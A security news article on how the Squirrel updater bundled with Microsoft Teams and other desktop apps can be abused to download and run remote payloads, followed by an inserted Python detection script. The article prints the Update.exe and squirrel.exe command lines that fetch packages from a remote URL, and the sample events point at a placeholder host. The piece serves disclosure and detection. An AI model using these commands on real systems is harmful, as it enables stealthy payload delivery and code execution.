The update mechanism as it is currently implemented in the Microsoft Teams desktop app allows downloading and executing arbitrary files on the system.

The same issue affects the GitHub, WhatsApp, and UiPath desktop software, but there it can be used only to download a payload.

These applications rely on the open source Squirrel project to manage installation and updating routines, which uses NuGet package manager to create the necessary files.

Multiple security researchers discovered that, by using the 'update' command of a vulnerable application, it is possible to execute an arbitrary binary in the context of the current user. The same goes for 'squirrel.exe.'

With Microsoft Teams, a payload is added to its folder and executed automatically using either of the following commands:

Update.exe --update [url to payload]
squirrel.exe --update [url to payload]

The commands can be used with other arguments, including 'download,' which enables retrieving the payload in the form of a NuGet package from a remote location.

Update.exe --download [url to payload]
squirrel.exe --download [url to payload]

Another command can be used to both download and execute a malicious package from a remote location:

Update.exe --updateRollback [url to payload]
squirrel.exe --updateRollback [url to payload]

The same method is valid for "squirrel.exe," which is also part of the Microsoft Teams installation package. Both executables are now listed in the Living Off The Land Binaries and Scripts (LOLBAS) database on GitHub.
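As an added defender-side example (not code from the article or from the researchers it cites), the following Python checks process-creation command lines for a Squirrel updater (Update.exe or squirrel.exe) invoked with one of the switches above and an http(s) source, which is what the commands listed above look like in endpoint telemetry. The sample events and user paths are constructed, not real telemetry.

```python
import re
from urllib.parse import urlparse

# Squirrel updater binaries named in the article, and the switches it describes.
SQUIRREL_BINARIES = {"update.exe", "squirrel.exe"}
SUSPICIOUS_SWITCHES = {"--update", "--download", "--updaterollback"}
# Switches that, per the article, also execute the downloaded package.
EXECUTING_SWITCHES = {"--update", "--updaterollback"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return re.split(r"[\\/]", path)[-1].lower()


def is_remote_source(arg):
    """True when the switch argument is an http or https URL."""
    parsed = urlparse(arg)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)


def inspect_command_line(cmdline):
    """Return a finding for a Squirrel updater pointed at a remote source, else None."""
    tokens = tokenize(cmdline)
    if not tokens or basename(tokens[0]) not in SQUIRREL_BINARIES:
        return None
    for i in range(1, len(tokens) - 1):
        switch = tokens[i].lower()
        if switch in SUSPICIOUS_SWITCHES and is_remote_source(tokens[i + 1]):
            return {"binary": basename(tokens[0]), "switch": switch,
                    "source": tokens[i + 1], "executes": switch in EXECUTING_SWITCHES}
    return None


# Constructed sample process-creation command lines (assumed paths, not real telemetry).
SAMPLE_EVENTS = [
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --processStart "Teams.exe"',
    r'"C:\Users\alice\AppData\Local\Microsoft\Teams\Update.exe" --update http://203.0.113.10/pkg',
    r'"C:\Users\bob\AppData\Local\GitHubDesktop\Update.exe" --download https://203.0.113.10/pkg',
    r'"C:\Users\carol\AppData\Local\Microsoft\Teams\current\squirrel.exe" --updateRollback http://203.0.113.10/pkg',
    r'"C:\Windows\System32\notepad.exe" --update http://203.0.113.10/pkg',
]


def scan(events):
    """Run inspect_command_line over every event and keep the findings."""
    return [f for f in (inspect_command_line(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The first event is the ordinary Teams launch shortcut and is not flagged; a rule like this belongs alongside an allowlist of the vendor update hosts an organisation actually expects.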

Reverse engineer Reegun Richard tested the issue on Microsoft Teams and reported it to the company on June 4. The application continues to be vulnerable at this point as Microsoft informed the researcher that the fix would come in a future release of the software.

Trying to replicate the effect with GitHub, WhatsApp, and UiPath did not achieve execution of the payload; only downloading it from a remote server was possible.

"In this scenario, an attacker can use this method to mask the payload download," which is still useful for an adversary, Richard told BleepingComputer.

Rooting for the blue team, Richard wanted to keep the details private until Microsoft released a patch, but they became public before that happened.

Another researcher playing for the red team, Mr. Un1k0d34 of the RingZer0 Team, had found the issue and published the details.

In a thread on Twitter, Richard explains the process of finding the bug and its root cause. He started from previous research published in late March by Hexacorn, which focused on living-off-the-land binaries (lolbins) in Electron-based apps.

Richard also made a video demonstrating how an attacker could use Microsoft Teams to get a shell on the target computer. Full details about exploiting this issue are available in a blog post from the researcher.

Microsoft Teams is intended for business use as a step up from Skype for Business. It is an alternative to Slack and offers unified communications with video meetings, file storage, and collaboration features. It supports extensions for integration with products from other developers.

Update [07/02/2019]: Article updated to add a new parameter that can be used to both download and execute a package hosted on a remote server, according to Reegun Richard.
